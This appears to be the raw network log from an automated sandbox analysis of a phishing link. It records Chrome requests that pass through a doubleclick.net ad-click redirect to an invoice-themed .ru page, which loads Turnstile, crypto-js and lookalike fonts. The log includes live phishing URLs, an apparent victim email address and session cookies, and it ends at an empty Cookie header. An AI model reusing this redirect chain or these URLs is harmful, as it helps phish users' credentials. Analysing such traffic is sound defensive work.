                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: global trafficHTTP traffic detected: GET /pcs/click?ref={{RANDOM_STRING}}&id=Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&token={{RANDOM_STRING}}&adurl=https%3A%2F%2Fadclick.g.doubleclick.net%2Fpcs%2Fclick%3Fref%3D{{RANDOM_STRING}}%26id%3DY41515N2435yMX419snVO7695-2024-McWAN324SCAN%26adurl%3Dhttps%3A%2F%2F2025_Notificationx1Invoice_Review.fmhjhctk.ru%2FaNAtEaDInodo%2F%23Yjohng@edcodistributing.com HTTP/1.1Host: adclick.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /pcs/click?ref={{RANDOM_STRING}}&id=Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&adurl=https://2025_Notificationx1Invoice_Review.fmhjhctk.ru/aNAtEaDInodo/ HTTP/1.1Host: adclick.g.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "134.0.6998.36"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmwPyE9NNHfXIFRvrboyi66lXX3F2TC05ppn8r5dZgArqmIcxJtOVsHHe-M
                Source: global trafficHTTP traffic detected: GET /aNAtEaDInodo/ HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=6D1OqZqOk90p2FhVbY2uvjws2yqvfcYrLJOX6hJhS7k-1742245029-1.0.1.1-o6K.NzptcjyPwRwmM5r8YuPkSTusR2vCJSQO6i9hYsYHiIALUmvofSaiXsBOn9JlFu.OeQZ2RYKq3AQoix1kdA9CIqNWYy2IQcDLdK3Ulo8
                Source: global trafficHTTP traffic detected: GET /loray$vfuz4e HTTP/1.1Host: zy03ki.qakaco.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://2025_notificationx1invoice_review.fmhjhctk.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /loray$vfuz4e HTTP/1.1Host: zy03ki.qakaco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /aNAtEaDInodo/ HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkgrNjVscFFPN1U3clpSR3pKQjhiTlE9PSIsInZhbHVlIjoiQ3VWWng1V3lJNmZOaXhwS25qMzZTVzVVRW1VUzRMbW5FNXFBWmtRaUVFZHgvV09yZktKeGpSMUVnZmtBMTBCVldPY0xSN09sRnJ5cHVDWHlpMW1SNnFvMjV6cE9Lenk5Z2t0NFRUVWxZOXVEZTZzbFBpaUsxbGNwMTk4TnJsU3UiLCJtYWMiOiI2NWIxODE1YTAyOTFjYTM1ZjlmMzEyODA0YjA5ZWU4NDNlNGRmYTkxOWQ0ZjQ4ZDFlZTc4ZjNiNTYyYzAxNDYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhBamkvT25rd3pYNk0yTnZLR1dva0E9PSIsInZhbHVlIjoiTEZxK1V1RlUzN1RRbEhqbkJ3VkVWRmpjWlV4RjRuSFRFNGF4SzN1bmtFTFhvVkxOMGFaQktQMko4bFMrWnZZZW1yUFcrQWFrREdQYkFGLzJLMWJJQkpFTU9YZE1mc2pMY2RHM0RQejYrNVJjSFlOZ0VHVnNjNGRKSmVnLzlOeFgiLCJtYWMiOiJmNWMxODU2NzM4NjVkYjVlYzJlMWVkMTNlYjg3NDlhZWQyNjZlNTQ5Mjg2MTczYjI1NjhmNTc3ZjRlNTQzNzRlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ve47VQocLux8bJ296yn6GsK0qKDjDkaqz7v HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkgrNjVscFFPN1U3clpSR3pKQjhiTlE9PSIsInZhbHVlIjoiQ3VWWng1V3lJNmZOaXhwS25qMzZTVzVVRW1VUzRMbW5FNXFBWmtRaUVFZHgvV09yZktKeGpSMUVnZmtBMTBCVldPY0xSN09sRnJ5cHVDWHlpMW1SNnFvMjV6cE9Lenk5Z2t0NFRUVWxZOXVEZTZzbFBpaUsxbGNwMTk4TnJsU3UiLCJtYWMiOiI2NWIxODE1YTAyOTFjYTM1ZjlmMzEyODA0YjA5ZWU4NDNlNGRmYTkxOWQ0ZjQ4ZDFlZTc4ZjNiNTYyYzAxNDYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhBamkvT25rd3pYNk0yTnZLR1dva0E9PSIsInZhbHVlIjoiTEZxK1V1RlUzN1RRbEhqbkJ3VkVWRmpjWlV4RjRuSFRFNGF4SzN1bmtFTFhvVkxOMGFaQktQMko4bFMrWnZZZW1yUFcrQWFrREdQYkFGLzJLMWJJQkpFTU9YZE1mc2pMY2RHM0RQejYrNVJjSFlOZ0VHVnNjNGRKSmVnLzlOeFgiLCJtYWMiOiJmNWMxODU2NzM4NjVkYjVlYzJlMWVkMTNlYjg3NDlhZWQyNjZlNTQ5Mjg2MTczYjI1NjhmNTc3ZjRlNTQzNzRlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InpxVTd4OTBYQXBFRzZhaC9veW5YakE9PSIsInZhbHVlIjoiUFRjT25lNWo5RTNaQyttK2ZodXNCQXJNL0ZPaWVXek9mL1lHNGoxaWZJb0czT1Iya3BubWlYV092ZHp5QnFYekdxejNYTjFMbmpjWDJudTNsZ1Z0Y1ZJYVNsTVk5ZnVNV25HQzhxcTFiU2lsZ0dDRUxaTjVGaGdOSUFIU2dJS3giLCJtYWMiOiJkN2RiZjkzOWRkYmVjZDcyZGFlMTAwMDg0OTk1YjkyYTEyZWZjM2QxYTJmM2Y1MzBkOTM2ZDJhYzJjODgzZTEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im05UzFKRVBIMGoySkN5Qk9sVmZoc1E9PSIsInZhbHVlIjoieFZUbFB2dmtneTZ2VFNFbW1kQnF4WGNSb2hBcm9DWms2clhzZDl0VkpIWkNOUzN3M2lZakI1c3h0RHVTbnhGNk9mbUdxdEN4ZkVnZXlJS2l5cjVXREhmMU5vcnlYZUVTcU5ldUlxR2R0SHZwcFpicENZcXpVM2xtVzRSNTJ1VHAiLCJtYWMiOiJmMTQ2NDcxOWZjYTcwMzNkOTdmOTIzOWY2NDMwYjE1MWJlMTEyOThiOTNkMzczYmQ2M2ZjOTcxMjEzMjMwNmRlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kfQGTJxyJYyA40vgITtDB0PwqPDDJNVk7exSUpKdygy HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkEzZjNOWXNBdW9qeU51alJhWXJrdFE9PSIsInZhbHVlIjoiRThjMERLWmdFV0tOdmRtVDkvYWlnbmxMOFBDN3JYQVpWS3dsQ3IrdEppYTNEdysyL3JhV1pkWHhTSUFaUFZGMUswZ2JKajVveG1yeTlPZG1LVWZxb0NTRkhpZlJsVUJ5QXNia25jNVhnOS9uYkZSSVVsdzVrQUhyUWZnSzJXRnUiLCJtYWMiOiI2MDkyY2VmMjIzMzc1YWI3YmJlZTJjM2VjMmRkMTNmZGNiNmRhNTVlYzhhMzhkYmU2NTUwYjkzN2Q0NGU0MjBhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imp5T2ttbW0ya01pTVREZ1M0RkJwQUE9PSIsInZhbHVlIjoiNUx4c1c0bk9BalpzMVJOVUJYRUQ5aUMvTC9pNmhLNXMrUDFQL1o1bTJYSkxJUmlMMC93V1Jicks5ODIxdnJwRVY5N0swN3I3ejZxdEZ3STNUQzIrV0lNM2xhamUwMitUSk5aN3FMUm04dERYM2tGOCtlS3dQQmp5SFFINCtLUzkiLCJtYWMiOiIxYjM5NGYxZGIyODFiY2NmNTM1MjI1ZWNjMjEzMGQ0MzRlNzVjMjIzMTQ5YjNiN2UwMWZiZWMzNzQ3YWIyYWQ1IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBK HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkEzZjNOWXNBdW9qeU51alJhWXJrdFE9PSIsInZhbHVlIjoiRThjMERLWmdFV0tOdmRtVDkvYWlnbmxMOFBDN3JYQVpWS3dsQ3IrdEppYTNEdysyL3JhV1pkWHhTSUFaUFZGMUswZ2JKajVveG1yeTlPZG1LVWZxb0NTRkhpZlJsVUJ5QXNia25jNVhnOS9uYkZSSVVsdzVrQUhyUWZnSzJXRnUiLCJtYWMiOiI2MDkyY2VmMjIzMzc1YWI3YmJlZTJjM2VjMmRkMTNmZGNiNmRhNTVlYzhhMzhkYmU2NTUwYjkzN2Q0NGU0MjBhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imp5T2ttbW0ya01pTVREZ1M0RkJwQUE9PSIsInZhbHVlIjoiNUx4c1c0bk9BalpzMVJOVUJYRUQ5aUMvTC9pNmhLNXMrUDFQL1o1bTJYSkxJUmlMMC93V1Jicks5ODIxdnJwRVY5N0swN3I3ejZxdEZ3STNUQzIrV0lNM2xhamUwMitUSk5aN3FMUm04dERYM2tGOCtlS3dQQmp5SFFINCtLUzkiLCJtYWMiOiIxYjM5NGYxZGIyODFiY2NmNTM1MjI1ZWNjMjEzMGQ0MzRlNzVjMjIzMTQ5YjNiN2UwMWZiZWMzNzQ3YWIyYWQ1IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /12EsS6v4KGIxyn856713 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xyEc4pKtKNGKpq6cd30 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 